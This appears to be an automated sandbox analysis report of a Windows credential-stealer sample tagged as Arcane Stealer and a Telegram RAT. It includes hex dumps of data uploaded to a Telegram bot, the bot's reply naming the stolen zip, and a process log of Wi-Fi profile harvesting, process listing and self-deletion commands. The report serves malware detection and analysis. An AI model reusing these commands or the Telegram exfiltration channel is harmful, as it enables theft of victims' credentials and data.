                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: 6f 72 77 2f 7b da 5f c4 e0 bd 8a e3 5e 9c c4 85 59 d0 4b 60 b7 08 de 5c 1f bd 86 dd d4 47 7a 9d 5f 74 1a 19 ff 95 97 b0 e9 4d 2f f8 f8 b9 d3 e1 53 95 48 2c 9c 2e 7f 40 e8 67 b9 9b b8 61 1f 15 4d 47 8d 83 c4 39 aa d9 54 55 d9 25 1b 57 9b 37 a5 13 c2 6f 36 8e cd 93 e5 d4 57 01 21 ed ed 27 71 62 7c 4a 3c 75 27 5e d9 81 db 0c 96 03 b3 89 6e d8 d4 57 d3 8e b1 32 19 c2 29 2b 9d 3b cc 98 3b 48 cb 2a ff 70 bb 33 ff 06 af c2 02 58 64 9f 13 3b 08 92 80 10 a4 0a db f6 0f 11 41 0b c6 e5 af eb 6b 7c cb 4d 49 0c 8b c2 c0 9c 72 24 84 a8 31 8c 14 cc 98 7f 47 d9 ed 12 53 12 49 b8 07 65 1f 21 61 57 24 88 80 20 e2 3a e5 50 e2 f2 f3 1a 49 58 07 c2 13 04 44 55 b0 17 b0 63 61 d8 20 96 91 4e df 00 03 5e 32 37 be 4f 2a ef ec 50 a1 dd 6b 0c 35 75 22 b6 1f 6c 2b 24 ce 0f 02 ea aa
                                                                                        Data Ascii: orw/{_^YK`\Gz_tM/SH,.@gaMG9TU%W7o6W!'qb|J<u'^nW2)+;;H*p3Xd;Ak|MIr$1GSIe!aW$ :PIXDUca N^27O*Pk5u"l+$
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: e5 b4 1f b3 7a ae 24 bc 4e 91 ea 05 6f 56 f5 95 dc 8a 31 53 b5 f0 f0 92 16 06 b2 23 cc ea 2d db 3d bf eb c7 13 e6 3d fe 43 9b 06 17 3b b7 a4 27 1b 06 58 56 d3 9f 46 79 ba b9 af ce 8e dd e7 7a df c9 bd c5 f3 fe a2 ac 40 79 f7 db bf b8 b9 7a 60 a7 43 a7 e1 dd 4b d3 81 b5 99 d8 20 9f 38 a3 ba aa ba 58 cf 87 8f 57 28 da 59 d8 6e 98 8e 86 69 7e 61 6f 57 ab ae a8 94 cd 7c 99 7d 07 99 d6 ff 79 0b 76 84 99 0e f8 ef 8e 6b d7 5e 6d e7 5d 75 96 be db b3 03 4d 57 c6 89 80 aa dc 09 c3 6b 83 18 4e 85 e9 aa 0b b6 5c 0e 03 6a cd ee 4f fe 6a 35 10 76 3a 66 0f ad 0f 5e 9f 96 47 6c 14 e5 7f ac aa c7 9b 23 64 56 23 7f 89 ff b1 7c 24 b4 35 5b a7 a2 f7 4c 7e 56 02 0f 28 07 be 51 6f 73 79 74 c5 75 e4 a2 c7 12 46 a5 6a b4 d6 6e 66 00 32 64 c1 ba d7 40 08 8a e8 99 1f 7f 77 f7 b3
                                                                                        Data Ascii: z$NoV1S#-==C;'XVFyz@yz`CK 8XW(Yni~aoW|}yvk^m]uMWkN\jOj5v:f^Gl#dV#|$5[L~V(QosytuFjnf2d@w
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: 61 e9 fe 40 f1 97 85 ac 6c c4 d6 c7 bd f7 51 dd 03 58 91 fe 6c d9 ac 81 f0 32 8e af 4f 0c 4c a5 8f b8 07 10 09 c6 dd 50 2f 9b fa a9 b1 04 3b 4c aa a8 89 d8 21 f2 91 79 5f 1f 9b 40 2b 7b 61 da af a0 01 5a 9c 72 24 48 d3 5a 29 98 93 40 10 3c 8b 0d ae 91 d0 91 dc 4c 33 f7 8c e1 a4 51 b1 e7 fe ab 5f a0 d3 86 e1 40 3a 97 f2 af 5c 8c 44 a1 cf b8 16 7f ce 7d 52 19 1c c6 10 89 07 39 0b c9 84 a4 5a 85 24 a0 ad 52 cc 18 2b 69 ed 36 38 46 19 89 37 7b 5c f7 bf 0c 20 08 b9 23 08 1f 08 83 2b cf d2 ff 05 25 a5 f5 50 67 90 69 5e 09 32 8a 2b 89 99 fa 1a 6d 09 3a 20 f2 52 0a 81 58 75 25 fc 69 0e 09 bf 0b 87 c2 51 7a b8 9c 37 d0 fc f6 40 2d 0d 5a a7 13 14 4a b9 4f 9a 91 9f 70 63 d9 18 cb a0 a5 8f b1 19 34 bb 1f d3 c6 48 33 88 07 31 8a 3a 29 5f 9c bd dd 99 8c 51 38 a2 c7 49
                                                                                        Data Ascii: a@lQXl2OLP/;L!y_@+{aZr$HZ)@<L3Q_@:\D}R9Z$R+i68F7{\ #+%Pgi^2+m: RXu%iQz7@-ZJOpc4H31:)_Q8I
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: c8 d8 bb 79 d2 64 ee 98 d5 7f 2c 35 36 76 48 04 0c ae 8b 9d 73 a9 9c ca bc 34 b7 ba 4b 95 e0 5d ba 1b 7c 7b 54 fe dd a5 80 ba 04 c4 56 77 06 53 86 67 e7 56 ad 96 f0 2b 97 60 d5 b6 67 a5 ce 52 36 a8 7d 03 bf 82 d1 48 37 f1 5d ca f1 37 4f de e9 8e d3 e7 64 e6 63 27 33 24 7d 3f 3f bf 2f f8 7a e4 6a 92 de 08 63 04 03 fc bf b8 eb ce 29 16 66 fa d5 92 cb ab 84 dc 80 39 0e c1 0c f5 32 f5 ef 89 43 cd 4e 72 2f 5c 85 06 aa 63 e4 27 cc 93 df 16 c4 1e cf 3f 64 96 a7 28 de 1a 58 ab 19 e2 e6 b5 2c 13 7e e5 1e 50 f2 c7 59 69 19 65 99 6a fa 5b af d8 f5 01 25 a3 04 e2 a4 92 1f e0 c3 52 31 b4 8f fe 7c a6 08 2f bd f1 b4 19 72 e8 78 60 24 57 15 74 8d 96 9e 2f 69 ed f8 66 f6 ef 6a e6 9b 29 c5 d6 04 a6 3f f7 b6 03 8d 4d d2 95 14 6d 0b c7 6a 3d fa 47 27 ac ad ee 10 01 a7 aa f9
                                                                                        Data Ascii: yd,56vHs4K]|{TVwSgV+`gR6}H7]7Odc'3$}??/zjc)f92CNr/\c'?d(X,~PYiej[%R1|/rx`$Wt/ifj)?Mmj=G'
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: bd 2e ae ba 70 d8 e1 f8 24 b6 77 00 4a bb 17 b6 60 85 2f 83 39 7a 39 9d 29 3b 8b 9f 35 de 38 1c ad 34 0a f7 72 3d 53 7e 80 fb 74 fd 70 34 4f d3 b1 e6 8c a3 0e 89 28 19 91 28 be f5 48 d5 05 f5 9a b8 4f 4c 8b 26 54 6d bc c1 8f 7f d1 dd 2b ef b5 d1 12 eb 70 a6 65 8c 5a 11 7f 8d 89 7c 07 93 81 92 be db b5 f1 ce ef 7f df 88 99 59 df 90 e0 99 cb ba b0 cb fe a1 1d bd 14 37 a9 e9 ca 32 bf ad 79 45 a6 85 31 fd 0b 6f 6c 6c 6c 53 c4 50 d3 98 58 c0 f6 84 2e 16 f8 92 d8 8e 05 6e 58 e8 45 d0 ad 9e 4e 6f 68 3b c3 5c 1f 35 62 81 03 b2 f4 83 3c f5 aa 50 25 5f bb b8 76 a6 6a 46 f1 a0 7e 62 3f 0a c0 9f b6 c7 28 60 56 f2 d1 bb 5f 23 d1 02 25 7d 1c c5 9f 45 ca 3b ac ad 6f c7 f9 a6 ce f0 2f 6d 7d ea d5 37 b7 5b ef 1c 3f 89 8e ec 2d f8 4a 1f c2 c3 ef 7e fb cc 27 84 18 c9 3f 20
                                                                                        Data Ascii: .p$wJ`/9z9);584r=S~tp4O((HOL&Tm+peZ|Y72yE1olllSPX.nXENoh;\5b<P%_vjF~b?(`V_#%}E;o/m}7[?-J~'?
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: 76 77 a9 63 25 de b0 64 b7 af ea a7 e3 57 1e 01 8b f1 6f 1a 13 b4 dd 62 4b ac 99 e2 e9 57 bd 49 87 99 9f 7e 09 f8 71 73 21 c1 6c 79 29 ff dd 50 53 cd dd f5 24 8d 86 34 8d 4b aa c8 b8 6b 94 57 d5 f9 02 b5 24 17 87 16 b4 b9 76 2d 78 d9 9c 98 bc d9 55 a2 f7 e9 74 da a2 8a 84 3b ff e4 d3 7e d9 79 08 65 85 b7 ca ee ac 96 ee 66 65 d8 04 19 56 37 ec 6c 37 4d d7 4c 2a 52 1d 80 ff b0 bd 72 c0 fc 50 13 88 6c 16 78 b1 04 ba be f2 35 e8 c0 10 d9 c5 c4 2c 80 d4 2e 2f 5a 12 f0 60 e0 ca 70 f7 a6 8f f3 b5 72 f8 c5 66 a0 78 f5 d6 2b 03 1d e2 88 40 7f 1d e9 a3 d4 ca 1c bd 24 3b a7 89 e1 b7 16 cf 6b 1f 72 5c 7a 4b 0f 68 93 0c a8 b0 48 94 aa 50 96 83 46 05 86 d7 26 1a 8e 2b 3a da ea 39 4d dc 31 89 45 71 55 9f d9 11 1d 66 de f4 1e 94 da 4b 6a be 10 4f 32 4d ba 3f 49 67 0f 8a
                                                                                        Data Ascii: vwc%dWobKWI~qs!ly)PS$4KkW$v-xUt;~yefeV7l7ML*RrPlx5,./Z`prfx+@$;kr\zKhHPF&+:9M1EqUfKjO2M?Ig
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: f4 90 af bc c6 a8 36 1b d2 98 68 98 77 2f 82 1c 52 64 d0 f6 2c e7 82 af 5e d8 61 0f bd fc a9 cf 73 96 b6 b9 25 65 c9 b3 67 7f 7d 06 69 5a e9 2e 45 fe e1 69 86 fc bd 82 a0 06 fd 95 8e 6c e5 94 c1 b8 41 43 21 48 1c 90 c9 9f 3e c3 8c 16 f3 5f 76 06 55 c2 cb fa 53 7a c4 97 b4 d8 e3 a3 7e 2e 2b 8b 47 0c de 44 b4 f8 43 32 43 2e 52 2d 9d 81 7c 77 d0 4b e3 f1 4b 70 a2 f1 54 15 b9 ca b5 84 d0 98 fe 74 04 f8 68 30 a3 32 2c 1a 7d 91 65 55 e9 89 1b fd d1 d0 30 68 a5 8e ae 5d b7 c7 db eb 00 e6 65 1a 1b b5 67 df d3 8f 30 08 f7 eb 84 bf 58 89 3a 2d 2c de 54 14 f6 b2 ff 46 37 f0 c8 ec 9d 36 24 a8 ff 13 50 33 4b 21 9f fe 94 a9 b0 6c 50 e8 71 bd ca af 3f 3b 97 56 12 aa eb ab ad 47 f4 be fb 1b f6 e9 73 9f ec ed 94 46 74 3a e9 bd 47 46 2c 3f f6 4b 64 7e a0 66 65 41 d5 70 c7
                                                                                        Data Ascii: 6hw/Rd,^as%eg}iZ.EilAC!H>_vUSz~.+GDC2C.R-|wKKpTth02,}eU0h]eg0X:-,TF76$P3K!lPq?;VGsFt:GF,?Kd~feAp
                                                                                        2024-12-17 18:47:11 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-12-17 18:47:12 UTC859INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Tue, 17 Dec 2024 18:47:11 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":1093,"from":{"id":7501458999,"is_bot":true,"first_name":"AYE BOT)","username":"gfhsd68ybufaFGDHSufhbjsn_bot"},"chat":{"id":7768810529,"first_name":"Has been seized","username":"Taldic","type":"private"},"date":1734461231,"document":{"file_name":"[EN]8.46.123.189.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIERWdhxy_VffYO4OjAeOUq4rb_OESJAAJaFQAC2JEQU5Adm_zQ4ujnNgQ","file_unique_id":"AgADWhUAAtiREFM","file_size":89093}}}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:13:46:57
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\zyEDYRU0jw.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:171'008 bytes
                                                                                        MD5 hash:41D3660B5321768122F4C25AC9868FC3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Arcane, Description: Yara detected Arcane Stealer, Source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:13:47:04
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                                                                        Imagebase:0x790000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:13:47:04
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\chcp.com
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0xbd0000
                                                                                        File size:12'800 bytes
                                                                                        MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:netsh wlan show profiles
                                                                                        Imagebase:0x1080000
                                                                                        File size:82'432 bytes
                                                                                        MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:findstr All
                                                                                        Imagebase:0x350000
                                                                                        File size:29'696 bytes
                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"cmd.exe" /c tasklist
                                                                                        Imagebase:0x790000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:tasklist
                                                                                        Imagebase:0xdf0000
                                                                                        File size:79'360 bytes
                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:13:47:15
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
                                                                                        Imagebase:0x790000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:13:47:15
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\chcp.com
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0xbd0000
                                                                                        File size:12'800 bytes
                                                                                        MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:TaskKill /F /IM 1352
                                                                                        Imagebase:0x390000
                                                                                        File size:74'240 bytes
                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:Timeout /T 2 /Nobreak
                                                                                        Imagebase:0x1e0000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228
                                                                                        Imagebase:0x960000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:15.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:3.3%
                                                                                          Total number of Nodes:91
                                                                                          Total number of Limit Nodes:4
                                                                                          execution_graph 23502 d3b432 23503 d3b438 23502->23503 23504 d3b453 23503->23504 23506 d3aa78 23503->23506 23507 d3b488 OleInitialize 23506->23507 23508 d3b4ec 23507->23508 23508->23504 23458 d3ae90 DuplicateHandle 23459 d3af26 23458->23459 23460 d3a840 23461 d3a886 GetCurrentProcess 23460->23461 23463 d3a8d1 23461->23463 23464 d3a8d8 GetCurrentThread 23461->23464 23463->23464 23465 d3a915 GetCurrentProcess 23464->23465 23466 d3a90e 23464->23466 23467 d3a94b 23465->23467 23466->23465 23468 d3a973 GetCurrentThreadId 23467->23468 23469 d3a9a4 23468->23469 23509 6d04e78 23511 6d04e93 23509->23511 23510 6d04ed6 23511->23510 23513 6d052a8 23511->23513 23514 6d052a0 23513->23514 23515 6d052ab 23513->23515 23514->23510 23516 6d0531d 23515->23516 23519 6d05635 23515->23519 23526 6d0564d 23515->23526 23516->23510 23520 6d0563b 23519->23520 23521 6d0564e 23519->23521 23520->23516 23532 6d075d8 23521->23532 23536 6d0768e 23521->23536 23540 6d075c8 23521->23540 23527 6d05661 23526->23527 23529 6d075d8 LoadLibraryA 23527->23529 23530 6d075c8 LoadLibraryA 23527->23530 23531 6d0768e LoadLibraryA 23527->23531 23528 6d05687 23528->23516 23529->23528 23530->23528 23531->23528 23533 6d07623 23532->23533 23544 6d0777f 23533->23544 23534 6d076aa 23537 6d07693 23536->23537 23539 6d0777f LoadLibraryA 23537->23539 23538 6d076aa 23539->23538 23541 6d075d8 23540->23541 23542 6d0777f LoadLibraryA 23541->23542 23543 6d076aa 23542->23543 23546 6d077a4 23544->23546 23545 6d077aa 23545->23534 23546->23545 23547 6d078df LoadLibraryA 23546->23547 23548 6d0791e 23547->23548 23470 d32088 23471 d320ab 23470->23471 23475 6d04667 23471->23475 23483 6d04678 23471->23483 23472 d321ae 23476 6d04678 23475->23476 23490 6d03cac 23476->23490 23484 6d03cac CreateToolhelp32Snapshot 23483->23484 23485 6d046a0 23484->23485 23486 6d03cb8 Process32First 23485->23486 23489 6d046e0 23486->23489 23487 6d04738 23487->23472 23489->23487 23498 6d03cc4 23489->23498 23491 6d04768 CreateToolhelp32Snapshot 23490->23491 23493 6d046a0 23491->23493 23494 6d03cb8 23493->23494 23495 6d04808 Process32First 23494->23495 23497 6d04903 23495->23497 23499 6d04808 Process32First 23498->23499 23501 6d04903 23499->23501 23549 d324b8 23550 d324de 23549->23550 23551 d32555 23550->23551 23554 d35d78 23550->23554 23558 d35d68 23550->23558 23555 d35dab 23554->23555 23562 d35e70 23555->23562 23556 d35dd6 23556->23551 23559 d35dab 23558->23559 23561 d35e70 3 API calls 23559->23561 23560 d35dd6 23560->23551 23561->23560 23563 d35e9b 23562->23563 23566 d38848 23562->23566 23572 d38838 23562->23572 23563->23556 23567 d38882 23566->23567 23578 d38414 OleInitialize 23567->23578 23569 d3888b GetKeyboardLayout 23571 d388c2 23569->23571 23571->23563 23573 d38842 23572->23573 23579 d38414 OleInitialize 23573->23579 23575 d3888b GetKeyboardLayout 23577 d388c2 23575->23577 23577->23563 23578->23569 23579->23575

                                                                                          Executed Functions

                                                                                          Function 06D03CAC Relevance: 1.5, APIs: 1, Instructions: 48processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06D047CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3332741929-0
                                                                                          • Opcode ID: ad0cd3155097fdc837bc6520dea853687947fe021407f27072c9d2b5a1f53496
                                                                                          • Instruction ID: 4450f1df7efbe474995fc5cc6dd912b86773afee7f13c59b2be36ccc6994bf96
                                                                                          • Opcode Fuzzy Hash: ad0cd3155097fdc837bc6520dea853687947fe021407f27072c9d2b5a1f53496
                                                                                          • Instruction Fuzzy Hash: 4E11F5B5D00349DFDB50DF9AD584B9EBBF4EB89310F108459D519A7340C374A944CFA5
                                                                                          Function 00D3FC18 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $]q
                                                                                          • API String ID: 0-1007455737
                                                                                          • Opcode ID: 29678ec9608a9003fea0a7a2e5f85c7fba4f118f5c27dec250e8e63ca442f618
                                                                                          • Instruction ID: 6b143a032730565f1abe110cc06d3d2a03b7610f6f5de0075df5e9091d0cad26
                                                                                          • Opcode Fuzzy Hash: 29678ec9608a9003fea0a7a2e5f85c7fba4f118f5c27dec250e8e63ca442f618
                                                                                          • Instruction Fuzzy Hash: EF511F31A007058FC774DF29D54466AB7F2FF88310F248A39E496876A1DB30E846CB60
                                                                                          Function 06D0E338 Relevance: 1.0, Instructions: 973COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23638801a75cf34450699fea61ae06179401afcfb1e53308727ee9f2670e6d80
                                                                                          • Instruction ID: cb9b4f35801acf55b76c566bfd00af1cf9b3cdfd0984eb8e519781815f6c30c5
                                                                                          • Opcode Fuzzy Hash: 23638801a75cf34450699fea61ae06179401afcfb1e53308727ee9f2670e6d80
                                                                                          • Instruction Fuzzy Hash: F8927D71A045568FEBA5DF1CC8C0B6EB7B2FB84300F25CA64D955DB686C635EC82CB90
                                                                                          Function 06D06A68 Relevance: .6, Instructions: 571COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a85b992b381876a13f4eaf58d7285effd98ee79a757ccc34e9f447cab21ef2f1
                                                                                          • Instruction ID: 4b75ff5c2a76e4f66f0f90fba9ce94a064e441c09b46397c6c6b847ad548dba5
                                                                                          • Opcode Fuzzy Hash: a85b992b381876a13f4eaf58d7285effd98ee79a757ccc34e9f447cab21ef2f1
                                                                                          • Instruction Fuzzy Hash: 14221730B01216CFEB599F38C85476AB7F2EF88309F2085B9D44A9B395EB35D942CB51
                                                                                          Function 06E70430 Relevance: .4, Instructions: 363COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5cffaed401f2d7c0a5419ee78d91533554c0047812aa5848b5d8e2a60cb4ec4a
                                                                                          • Instruction ID: edab167711ffe8421b3f86b2e97e2bafc53c5fbd0f269d34c6178386a3ee1e5a
